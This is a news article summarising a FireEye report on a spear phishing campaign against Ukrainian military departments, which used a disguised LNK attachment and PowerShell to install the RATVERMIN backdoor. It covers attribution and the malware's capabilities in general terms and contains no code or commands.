Spear Phishing Campaign Targets Ukraine Military

Ukrainian military departments have been targeted by a spear phishing campaign as part of a cyber espionage operation in which the attackers attempt to drop a RATVERMIN backdoor.

Cybersecurity firm FireEye discovered the malicious campaign which is still ongoing against the Ukranian government. The campaign is reported to have started in 2018 and the hacking group behind the attack appears to be connected with Luhansk People’s Republic (LPR).

FireEye’s report states:

In early 2019, FireEye Threat Intelligence identified a spear phishing email targeting government entities in Ukraine. The spear phishing email included a malicious LNK file with PowerShell script to download the second-stage payload from the command and control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines.

LPR is an independent state in the Donbass region of Ukraine that is only recognized by the Donetsk People’s Republic and South Ossetia. The state declared sovereignty in 2014, however, the Ukrainian government does not officially recognize LPR as independent and declares the region is part of Ukraine.

As part of the scam, malicious emails were sent to military personnel with the subject line  “SPEC-20T-MK2-000-ISS-4.10-09-2018STANDARD”. These emails claimed to be from a UK defense manufacturer following up on a previous meeting.

The email also included an attachment which the recipient was encouraged to download. The attachment had the file name “Armtrac-Commercial.7z” and consisted of a zip file with two-word documents and an LNK file located inside that housed a malicious PowerShell script. This LNK file was disguised to look like a Microsoft Word icon. A copy of the email is below.

PowerShell command based malware attacks have risen in popularity among cybercriminals in recent years. PowerShell is a versatile and flexible language that can integrate and interact with a multitude of tech. PowerShell is attractive to hackers because it can run discreetly in the background and can be used to gather system information without the use of an executable file. PowerShell attacks first started being used in 2013, but picked up in 2016 and 2017 was the first time we saw a zip within a zip file being used to disguise an LNK attachment.

FireEye has determined that the hacking group appear to have been around since 2014, and their attacks are predominantly focused on targeting the Ukrainian state.

The RATVERMIN.NET backdoor is a Remote Access Tool (RAT) discovered in 2018 by Palo Alto Networks’ Unit 42. The malware collects information from the recipient’s computer using a keylogger and other means, then encrypts and stores the data. The backdoor also has the power to delete files, update malware, screenshot activity and kill apps and processes.

In their closing statement, FireEye stated:

This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR’s security service. While more evidence is needed for definitive attribution, this activity showcases the accessibility of competent cyber espionage capabilities, even to sub-state actors.